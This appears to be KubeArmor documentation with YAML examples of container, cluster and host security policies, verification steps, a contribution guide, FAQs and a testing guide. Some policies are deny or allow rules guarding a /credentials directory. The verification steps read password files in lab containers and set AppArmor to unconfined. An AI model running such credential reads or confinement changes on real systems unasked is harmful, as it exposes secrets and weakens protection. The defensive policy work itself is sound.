  • fromSource

    If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash will be matched.

      process:
        matchPaths:
        - path: /bin/sleep
          - syscall:
            - unlink
          fromSource:
          - path: /bin/bash
  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

  • Action

      action: [Allow|Audit|Block]

Cluster Policy Examples for Containers

Here, we demonstrate how to define a cluster security policies.

  • Process Execution Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: In
              values:
                - nginx1
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the containers present in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'In' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx1
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all containers present in the cluster except that are in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'NotIn' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is not blocked. Now try running same command in container inside 'nginx2' namespace and it should not be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-matchlabels-in-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: In
              values:
                - nginx1
            - key: label
              operator: In
              values:
                - app=nginx
                - app=nginx-dev
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the workloads who match the labels app=nginx OR app=nginx-dev present in the namespace nginx1 . For this, we define the 'nginx1' as value and operator as 'In' for key namespace AND app=nginx & app=nginx-dev value and operator as 'In' for key label in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked. apt won't be blocked in a workload that doesn't have labels app=nginx OR app=nginx-dev in namespace nginx1 and all the workloads across other namespaces.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-matchlabels-not-in-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx2
            - key: label
              operator: NotIn
              values:
                - app=nginx
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all the workloads who doesn't match the labels app=nginx AND not present in the namespace nginx2 . For this, we define the 'nginx2' as value and operator as 'NotIn' for key namespace AND app=nginx value and operator as 'NotIn' for key label in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container within the namespace 'nginx2' and run '/usr/bin/apt'. You can see the operation is blocked. Then try to do same in other workloads present in different namespace and if they don't have label app=nginx, the operation will be blocked, in case container have label app=nginx, operation won't be blocked.

  • File Access Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-file-access
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx2
        file:
          matchPaths:
            - path: /etc/host.conf
              fromSource:
              - path: /usr/bin/cat
        action:
          Block
      
      • Explanation: The purpose of this policy is to block read access for '/etc/host.conf' in all the containers except the namespace 'bginx2'.

      • Verification: After applying this policy, please get into the container within the namespace 'nginx2' and run 'cat /etc/host.conf'. You can see the operation is not blocked and can see the content of the file. Now try to run 'cat /etc/host.conf' in container of 'nginx1' namespace, this operation should be blocked.

Note Other operations like Network, Capabilities, Syscalls also behave in same way as in security policy. The difference only lies in how we match the cluster policy with the namespaces.

Policy Examples for Containers

Here, we demonstrate how to define security policies using our example microservice (multiubuntu).

  • Process Execution Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-group-1-proc-path-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            group: group-1
        process:
          matchPaths:
          - path: /bin/sleep
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/bin/sleep' in the containers with the 'group-1' label. For this, we define the 'group-1' label in selector -> matchLabels and the specific path ('/bin/sleep') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers with the 'group-1' (using "kubectl -n multiubuntu exec -it ubuntu-X-deployment-... -- bash") and run '/bin/sleep'. You will see that /bin/sleep is blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-match-expression-in-notin-block-process
        namespace: multiubuntu
      spec:
        severity: 5
        message: "block execution of a matching binary name"
        selector:
          matchExpressions:
            - key: label
              operator: In
              values: 
                - container=ubuntu-1
            - key: label
              operator: NotIn
              values: 
                - container=ubuntu-3
        process:
          matchPaths:
          - execname: apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of 'apt' binary in all the workloads in the namespace multiubuntu, who contains label container=ubuntu-1. For this, we define the 'container=ubuntu-1' as value and operator as 'In' for key label in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. The other expression container=ubuntu-3 value and operator as 'NotIn' for key label is not mandatory because if we mention something in 'In' operator, everything else is just not slected for matching. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see the binary is blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1, the binary won't be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-match-expression-notin-block-process
        namespace: multiubuntu
      spec:
        severity: 5
        message: "block execution of a matching binary name"
        selector:
          matchExpressions:
            - key: label
              operator: NotIn
              values: 
                - container=ubuntu-1
        process:
          matchPaths:
          - execname: apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of 'apt' binary in all the workloads in the namespace multiubuntu, who doesn't contains label container=ubuntu-1. For this, we define the 'container=ubuntu-1' as value and operator as 'In' for key label in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see the binary is not blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1, the binary will be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-1-proc-dir-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-1
        process:
          matchDirectories:
          - dir: /sbin/
        action:
          Block
      • Explanation: The purpose of this policy is to block all executables in the '/sbin' directory. Since we want to block all executables rather than a specific executable, we use matchDirectories to specify the executables in the '/sbin' directory at once.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run '/sbin/route' to see if this command is allowed (this command will be blocked).

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-2-proc-dir-recursive-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-2
        process:
          matchDirectories:
          - dir: /usr/
            recursive: true
        action:
          Block
      • Explanation: As the extension of the previous policy, we want to block all executables in the '/usr' directory and its subdirectories (e.g., '/usr/bin', '/usr/sbin', and '/usr/local/bin'). Thus, we add 'recursive: true' to extend the scope of the policy.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-2' label and run '/usr/bin/env' or '/usr/bin/whoami'. You will see that those commands are blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-3-file-dir-allow-from-source-path
        namespace: multiubuntu
      spec:
        severity: 10
        message: "a critical directory was accessed"
        tags:
        - WARNING
        selector:
          matchLabels:
            container: ubuntu-3
        file:
          matchDirectories:
          - dir: /credentials/
            fromSource:
            - path: /bin/cat
        action:
          Allow
      • Explanation: Here, we want the container with the 'ubuntu-3' label only to access certain files by specific executables. Otherwise, we want to block any other file accesses. To achieve this goal, we define the scope of this policy using matchDirectories with fromSource and use the 'Allow' action.

      • Verification: In this policy, we allow /bin/cat to access the files in /credentials only. After applying this policy, please get into the container with the 'ubuntu-3' label and run 'cat /credentials/password'. This command will be allowed with no errors. Now, please run 'cat /etc/hostname'. Then, this command will be blocked since /bin/cat is only allowed to access /credentials/*.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-3-proc-path-owner-allow
        namespace: multiubuntu
      spec:
        severity: 7
        selector:
          matchLabels:
            container: ubuntu-3
        process:
          matchPaths:
          - path: /home/user1/hello
            ownerOnly: true
          matchDirectories:
          - dir: /bin/ # required to change root to user1
            recursive: true
          - dir: /usr/bin/ # used in changing accounts
            recursive: true
        file:
          matchPaths:
          - path: /root/.bashrc # used by root
          - path: /root/.bash_history # used by root
          - path: /home/user1/.profile # used by user1
          - path: /home/user1/.bashrc # used by user1
          - path: /run/utmp # required to change root to user1
          - path: /dev/tty
          matchDirectories:
          - dir: /etc/ # required to change root to user1 (coarse-grained way)
            recursive: true
          - dir: /proc/ # required to change root to user1 (coarse-grained way)
            recursive: true
        action:
          Allow
      • Explanation: This policy aims to allow a specific user (i.e., user1) only to launch its own executable (i.e., hello), which means that we do not want for the root user to even launch /home/user1/hello. For this, we define a security policy with matchPaths and 'ownerOnly: ture'.

      • Verification: For verification, we also allow several directories and files to change users (from 'root' to 'user1') in the policy. After applying this policy, please get into the container with the 'ubuntu-3' label and run '/home/user1/hello' first. This command will be blocked even though you are the 'root' user. Then, please run 'su - user1'. Now, you are the 'user1' user. Please run '/home/user1/hello' again. You will see that it works now.

  • File Access Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-4-file-path-readonly-allow
        namespace: multiubuntu
      spec:
        severity: 10
        message: "a critical file was accessed"
        tags:
        - WARNING
        selector:
          matchLabels:
            container: ubuntu-4
        process:
          matchDirectories:
          - dir: /bin/ # used by root
            recursive: true
          - dir: /usr/bin/ # used by root
            recursive: true
        file:
          matchPaths:
          - path: /credentials/password
            readOnly: true
          - path: /root/.bashrc # used by root
          - path: /root/.bash_history # used by root
          - path: /dev/tty
          matchDirectories:
          - dir: /etc/ # used by root (coarse-grained way)
            recursive: true
          - dir: /proc/ # used by root (coarse-grained way)
            recursive: true
        action:
          Allow
      • Explanation: The purpose of this policy is to allow the container with the 'ubuntu-4' label to read '/credentials/password' only (the write operation is blocked).

      • Verification: After applying this policy, please get into the container with the 'ubuntu-4' label and run 'cat /credentials/password'. You can see the contents in the file. Now, please run 'echo "test" >> /credentials/password'. You will see that the write operation will be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-5-file-dir-recursive-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-5
        file:
          matchDirectories:
          - dir: /credentials/
            recursive: true
        action:
          Block
      • Explanation: In this policy, we do not want the container with the 'ubuntu-5' label to access any files in the '/credentials' directory and its subdirectories. Thus, we use 'matchDirectories' and 'recursive: true' to define all files in the '/credentials' directory and its subdirectories.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'cat /secret.txt'. You will see the contents of /secret.txt. Then, please run 'cat /credentials/password'. This command will be blocked due to the security policy.

  • Network Operation Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-5-net-icmp-audit
        namespace: multiubuntu
      spec:
        severity: 8
        selector:
          matchLabels:
            container: ubuntu-5
        network:
          matchProtocols:
          - protocol: icmp
        action:
          Audit
      • Explanation: We want to audit sending ICMP packets from the containers with the 'ubuntu-5' label while allowing packets for the other protocols (e.g., TCP and UDP). For this, we use 'matchProtocols' to define the protocol (i.e., ICMP) that we want to block.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Permission denied' since the 'ping' command internally uses the ICMP protocol.

  • Capabilities Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-1-cap-net-raw-block
        namespace: multiubuntu
      spec:
        severity: 1
        selector:
          matchLabels:
            container: ubuntu-1
        capabilities:
          matchCapabilities:
          - capability: net_raw
        action:
          Block
      • Explanation: We want to block any network operations using raw sockets from the containers with the 'ubuntu-1' label, meaning that containers cannot send non-TCP/UDP packets (e.g., ICMP echo request or reply) to other containers. To achieve this, we use matchCapabilities and specify the 'CAP_NET_RAW' capability to block raw socket creations inside the containers. Here, since we use the stream and datagram sockets to TCP and UDP packets respectively, we can still send those packets to others.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Operation not permitted' since the 'ping' command internally requires a raw socket to send ICMP packets.

  • System calls alerting

    • Alert for all unlink syscalls

      apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: audit-all-unlink
        namespace: default
      spec:
        severity: 3
        selector:
          matchLabels:
            container: ubuntu-1
        syscalls:
          matchSyscalls:
          - syscall:
            - unlink
        action:
          Audit
Generated telemetry
{
  "Timestamp": 1661936135,
  "UpdatedTime": "2022-08-31T08:55:35.368285Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "NamespaceName": "default",
  "PodName": "ubuntu-1-6779f689b5-jjcvh",
  "Labels": "container=ubuntu-1",
  "ContainerID": "1f613df8390b9d2e4e89d0323ac0b9a2e7d7ddcc460720e15074f8c497aec0df",
  "ContainerName": "nginx",
  "ContainerImage": "nginx:latest@sha256:b95a99feebf7797479e0c5eb5ec0bdfa5d9f504bc94da550c2f58e839ea6914f",
  "HostPPID": 255296,
  "HostPID": 296264,
  "PPID": 47,
  "PID": 65,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/usr/bin/unlink",
  "PolicyName": "audit-all-unlink",
  "Severity": "3",
  "Type": "MatchedPolicy",
  "Source": "/usr/bin/unlink home/secret.txt",
  "Operation": "Syscall",
  "Resource": "/home/secret.txt",
  "Data": "syscall=SYS_UNLINK",
  "Action": "Audit",
  "Result": "Passed"
}
  • Alert on all rmdir syscalls targeting anything in /home/ directory and sub-directories

    apiVersion: security.kubearmor.com/v1
    kind: KubeArmorPolicy
    metadata:
      name: audit-home-rmdir
      namespace: default
    spec:
      selector:
        matchLabels:
          container: ubuntu-1
      syscalls:
        matchPaths:
        - syscall:
          - rmdir
          path: /home/
          recursive: true
      action:
        Audit
Generated telemetry
{
  "Timestamp": 1661936575,
  "UpdatedTime": "2022-08-31T09:02:55.841537Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "NamespaceName": "default",
  "PodName": "ubuntu-1-6779f689b5-jjcvh",
  "Labels": "container=ubuntu-1",
  "ContainerID": "1f613df8390b9d2e4e89d0323ac0b9a2e7d7ddcc460720e15074f8c497aec0df",
  "ContainerName": "nginx",
  "ContainerImage": "nginx:latest@sha256:b95a99feebf7797479e0c5eb5ec0bdfa5d9f504bc94da550c2f58e839ea6914f",
  "HostPPID": 255296,
  "HostPID": 302715,
  "PPID": 47,
  "PID": 67,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/rmdir",
  "PolicyName": "audit-home-rmdir",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/rmdir home/jane-doe/",
  "Operation": "Syscall",
  "Resource": "/home/jane-doe",
  "Data": "syscall=SYS_RMDIR",
  "Action": "Audit",
  "Result": "Passed"
}

Contribution Guide

KubeArmor maintainers welcome individuals and organizations from across the cloud security landscape (creators and implementers alike) to make contributions to the project. We equally value the addition of technical contributions and enhancements of documentation that helps us grow the community and strengthen the value of KubeArmor. We invite members of the community to contribute to the project!

To make a contribution, please follow the steps below.

  1. Fork this repository (KubeArmor)

    First, fork this repository by clicking on the Fork button (top right).

    Then, click your ID on the pop-up screen.

    This will create a copy of KubeArmor in your account.

  2. Clone the repository

    Now clone Kubearmor locally into your dev environment.

     $ git clone https://github.com/[your GitHub ID]/KubeArmor

    This will clone a copy of Kubearmor installed in your dev environment.

  3. Make changes

    First, go into the repository directory and make some changes.

  4. Check the changes

    If you have changed the core code of KubeArmor then please run tests before committing the changes

    cd tests
    ~/KubeArmor/tests$ make

    If you see any warnings or errors, please fix them first.

  5. Commit changes

    Please see your changes using "git status" and add them to the branch using "git add".

     $ cd KubeArmor
     ~/KubeArmor$ git status
     ~/KubeArmor$ git add [changed file]

    Then, commit the changes using the "git commit" command.

     ~/KubeArmor$ git commit -s -m "Add a new feature by [your name]"

    Please make sure that your changes are properly tested on your machine.

  6. Push changes to your forked repository

    Push your changes using the "git push" command.

     ~/KubeArmor$ git push
  7. Create a pull request with your changes with the following steps

    First, go to your repository on GitHub.

    Then, click "Pull request" button.

    After checking your changes, click 'Create pull request'.

    A pull request should contain the details of all commits as specific as possible, including "Fixes: #(issue number)".

    Finally, click the "Create pull request" button.

    The changes would be merged post a review by the respective module owners. Once the changes are merged, you will get a notification, and the corresponding issue will be closed.

  8. DCO Signoffs

    To ensure that contributors are only submitting work that they have rights to, we are requiring everyone to acknowledge this by signing their work. Any copyright notices in this repo should specify the authors as "KubeArmor authors".

    To sign your work, just add a line like this at the end of your commit message:

    Signed-off-by: FirstName LastName <email@address.com>

    This can easily be done with the -s or --signoff option to git commit.

    By doing this, you state that the source code being submitted originated from you (see https://developercertificate.org).

FAQs

How to get process events in the context of a specific pods?

Following command can be used to to get pod specific events:

karmor log --pod <pod_name> karmor log has following filter to provide more granularity:

--container - Specify container name for container specific logs
--logFilter <system|policy|all> - Filter to either receive system logs or alerts on policy violation
--logType <ContainerLog|HostLog> - Source of logs - ContainerLog: logs from containers or HostLog: logs from the host
--namespace - Specify the namespace for the running pods
--operation <Process|File|Network> - Type of logs based on process, file or network
How is KubeArmor different from admission controllers?

Kubernetes admission controllers are set of extensions that acts as a gatekeeper and help govern and control Kubernetes clusters. They intercept requests to the Kubernetes API server prior to the persistence of the object into etcd.

They can manage deployments requesting too many resources, enforce pod security policies, prevent vulnerable images from being deployed and check if the pod is running in privileged mode. But all these checks are done before the pods are started. Admission controllers doesn't guarantee any protection once the vulnerability is inside the cluster.

KuberArmor protects the pods from within. It runs as a daemonset and restricts the behavior of containers at the system level. KubeArmor allows one to define security policies for the assets/resources (such as files, processes, volumes etc) within the pod/container, select those based on K8s metadata and simply apply these security policies at runtime.

It also detects any policy violations and generates audit logs with container identities. Apart from containers, KuberArmor also allows protecting the Host itself.

What are the Policy Actions supported by KubeArmor?

KubeArmor defines 3 policy actions: Allow, Block and Audit. Allow: A whitelist policy or a policy defined with Allow action allows only the operations defined in the policy, rest everything is blocked/audited.Block: Policy defined with Block action blocks all the operations defined in the policy. Audit: An applied Audit policy doesn't block any action but instead provides alerts on policy violation. This type of policy can be used for "dry-run" before safely applying a security policy in production.

If Block policy is used and there are no supported enforcement mechanism on the platform then the policy enforcement wouldn't be observed. But we will still be able to see the observability data for the applied Block policy, which can help us in identifying any suspicious activity.

How to use KubeArmor on Oracle K8s engine?

KubeArmor supports enforcement on OKE leveraging the BPF-LSM. The default kernel for Oracle Linux 8.6 (OL 8.6) is UEK R6 kernel-uek-5.4.17-2136.307.3 which does not support BPF-LSM.

Unbreakable Enterprise Kernel Release 7 (UEK R7) is based on Linux kernel 5.15 LTS that supports BPF-LSM and it's available for Oracle Linux 8 Update 5 onwards.

Installing UEK 7 on OL 8.6

Note: After upgrading to the UEK R7 you may required to enable BPF-LSM if it's not enabled by default.

Checking and Enabling support for BPF-LSM

Checking if BPF-LSM is supported in the Kernel

We check for BPF LSM Support in Kernel Config

cat /boot/config-$(uname -r) | grep -e "BPF" -e "BTF"

Following flags need to exist and set to y

CONFIG_BPF=y
CONFIG_BPF_SYSCALL=y
CONFIG_BPF_JIT=y
CONFIG_BPF_LSM=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_BTF=y

Note: These config could be in other places too like /boot/config, /usr/src/linux-headers-$(uname -r)/.config, /lib/modules/$(uname -r)/config, /proc/config.gz.

Checking if BPF-LSM is enabled

  • check if bpf is enabled by verifying if it is in the active lsms.

    $ cat /sys/kernel/security/lsm
    capability,yama,selinux,bpf

    as we can see here bpf is in active lsms

Enabling BPF-LSM manually using boot configs

  • Open the /etc/default/grub file in privileged mode.

    sudo vi /etc/default/grub
  • Append the following to the GRUB_CMDLINE_LINUX variable and save.

    GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
  • Update grub config:

    # On Debian like systems
    sudo update-grub

    OR

    # On RHEL like systems
    sudo grub2-mkconfig -o /boot/grub2.cfg
  • Reboot into your kernel.

    sudo reboot
ICMP block/audit does not work with AppArmor as the enforcer

There is some problem with AppArmor due to which ICMP rules don't work as expected.

In the same environment we've found that ICMP rules with BPFLSM work as expected.

How to enable `KubeArmorHostPolicy` for k8s cluster?

By default the host policies and visibility is disabled for k8s hosts.

If you use following command, kubectl logs -n kubearmor <KUBEARMOR-POD> | grep "Started to protect" you will see, 2023-08-21 12:58:34.641665 INFO Started to protect containers. This indicates that only container/pod protection is enabled. If you have hostpolicy enabled you should see something like this, 2023-08-22 18:07:43.335232 INFO Started to protect a host and containers

One can enable the host policy by patching the daemonset (kubectl edit daemonsets.apps -n kubearmor kubearmor):

...
  template:
    metadata:
      annotations:
        container.apparmor.security.beta.kubernetes.io/kubearmor: unconfined
      creationTimestamp: null
      labels:
        kubearmor-app: kubearmor
    spec:
      containers:
      - args:
        - -gRPC=32767
+       - -enableKubeArmorHostPolicy
+       - -hostVisibility=process,file,network,capabilities
        env:
        - name: KUBEARMOR_NODENAME
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: spec.nodeName
...

This will enable the KubeArmorHostPolicy and host based visibility for the k8s worker nodes.

Using KubeArmor with Kind clusters

KubeArmor works out of the box with Kind clusters supporting BPF-LSM. However, with AppArmor only mode, Kind cluster needs additional provisional steps. You can check if BPF-LSM is supported/enabled on your host (on which the kind cluster is to be deployed) by using following:

cat /sys/kernel/security/lsm
  • If it has bpf in the list, then everything should work out of the box

  • If it has apparmor in the list, then follow the steps mentioned in this FAQ.

1. Create Kind cluster

cat <<EOF | kind create cluster --config -
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- extraMounts:
  - hostPath: /sys/kernel/security
    containerPath: /sys/kernel/security
EOF

2. Exec into kind node & install apparmor util

docker exec -it kind-control-plane bash -c "apt update && apt install apparmor-utils -y && systemctl restart containerd"

The above command will install the AppArmor utilities in the kind-control-plane, we can also use this command to install these in minikube as well as in all the other docker based Kubernetes environments.

It might be possible that apart from the dockerized kubenetes environment AppArmor might not be available on the master node itself in the Kubernetes cluster. To check for the same you can run the below command to check for the AppArmor support in kernel config:

cat /boot/config-$(uname -r) | grep -e "APPARMOR"

Following flags need to exist and set to y

CONFIG_SECURITY_APPARMOR=y

Run the command to install apparmor:

apt update && apt install apparmor-utils -y

You need to restart your CRI in-order to make APPARMOR available as a kernel config security.

If not then we need to install AppArmor utils on the master node itself.

If the kubearmor-relay pod goes into CrashLoopBackOff, apply the following patch:

kubectl patch deploy -n $(kubectl get deploy -l kubearmor-app=kubearmor-relay -A -o custom-columns=:'{.metadata.namespace}',:'{.metadata.name}') --type=json -p='[{"op": "add", "path": "/spec/template/metadata/annotations/container.apparmor.security.beta.kubernetes.io~1kubearmor-relay-server", "value": "unconfined"}]'
KubeArmor enforcement is not enabled/working

KubeArmor enforcement mode requires support of LSMs on the hosts. Certain distributions might not enable it out of the box. There are two ways to check this:

  1. During KubeArmor installation, it shows the following warning message:

KubeArmor is running in Audit mode, only Observability will be available and Policy Enforcement won't be available.
  1. Another way to check it is using karmor probe. If the Active LSM shown is blank, then the enforcement won't work.

Following updater daemonset will enable the required LSM on the nodes (in the future if new nodes are dynamically added, those nodes will be auto enabled as well).

kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/deployments/controller/ka-updater-kured.yaml

Note: Nodes who do not have necessary LSM will be restarted after the deployment of updater.

Once the nodes are restarted, karmor probe would then show Active LSM with appropriate value.

KubeArmor with WSL2

It is possible to deploy k3s on WSL2 to have a local cluster on your Windows machine. However, the WSL2 environment does not mount securityfs by default and hence /sys/kernel/security is not available by default. KubeArmor would still install on such system but without enforcement logic.

Thus with k3s on WSL2, you would still be able to run kubearmor but the block-based policies won't work. Using karmor probe would show Active LSM as blank which signals that the block-based policies won't work.

Testing Guide

Testing Guide

There are two ways to check the functionalities of KubeArmor: 1) testing KubeArmor manually and 2) using the testing framework.

0. Make sure Kubernetes cluster is running

0.1. Firstly Run 'kubectl proxy' in background

$ kubectl proxy &

0.2. Now run KubeArmor

~/KubeArmor/KubeArmor$ make run

1. Test KubeArmor manually

1.1. Run 'kubectl proxy' in background

$ kubectl proxy &

1.2. Compile KubeArmor

$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make

1.3. Run KubeArmor

~/KubeArmor/KubeArmor$ sudo -E ./kubearmor -gRPC=[gRPC port number]
                                           -logPath=[log file path]
                                           -enableKubeArmorPolicy=[true|false]
                                           -enableKubeArmorHostPolicy=[true|false]

1.4. Apply security policies into Kubernetes

Beforehand, check if the KubeArmorPolicy and KubeArmorHostPolicy CRDs are already applied.

$ kubectl explain KubeArmorPolicy

If they are still not applied, do so.

$ kubectl apply -f ~/KubeArmor/deployments/CRD/

Now you can apply specific policies.

$ kubectl apply -f [policy file]

1.5. Trigger policy violations to generate alerts

$ kubectl -n [namespace name] exec -it [pod name] -- bash -c [command]

1.6. Check generated alerts

  • $ karmor log [flags]

    flags:

    --gRPC string        gRPC server information
    --help               help for log
    --json               Flag to print alerts and logs in the JSON format
    --logFilter string   What kinds of alerts and logs to receive, {policy|system|all} (default "policy")
    --logPath string     Output location for alerts and logs, {path|stdout|none} (default "stdout")
    --msgPath string     Output location for messages, {path|stdout|none} (default "none")

    Note that you will see alerts and logs generated right after karmor runs logs; thus, we recommend to run the above command in other terminal to see logs live.

2. Test KubeArmor using the auto-testing framework

  • The case that KubeArmor is directly running in a host

    Compile KubeArmor

    $ cd KubeArmor/KubeArmor
    ~/KubeArmor/KubeArmor$ make clean && make

    Run the auto-testing framework

    $ cd KubeArmor/tests
    ~/KubeArmor/tests$ ./test-scenarios-local.sh

    Check the test report

    ~/KubeArmor/tests$ cat /tmp/kubearmor.test
  • The case that KubeArmor is running as a daemonset in Kubernetes

    Run the testing framework

    $ cd KubeArmor/tests
    ~/KubeArmor/tests$ ./test-scenarios-in-runtime.sh

    Check the test report

    ~/KubeArmor/tests$ cat /tmp/kubearmor.test
  • To run a specific suit of tests move to the directory of test and run

    ~/KubeArmor/tests/test_directory$ ginkgo --focus "Suit_Name"

Policy Spec for Nodes/VMs

Policy Specification

Here is the specification of a host security policy.

apiVersion: security.kubearmor.com/v1
kind:KubeArmorHostPolicy
metadata:
  name: [policy name]

spec:
  severity: [1-10]                         # --> optional 
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  nodeSelector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:
      - path: [absolute exectuable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:
      - path: [absolute exectuable path]

  action: [Audit|Block] (Block by default)

Note Please note that for system calls monitoring we only support audit action no matter what the value of action is

Policy Spec Description

Now, we will briefly explain how to define a host security policy.

  • Common

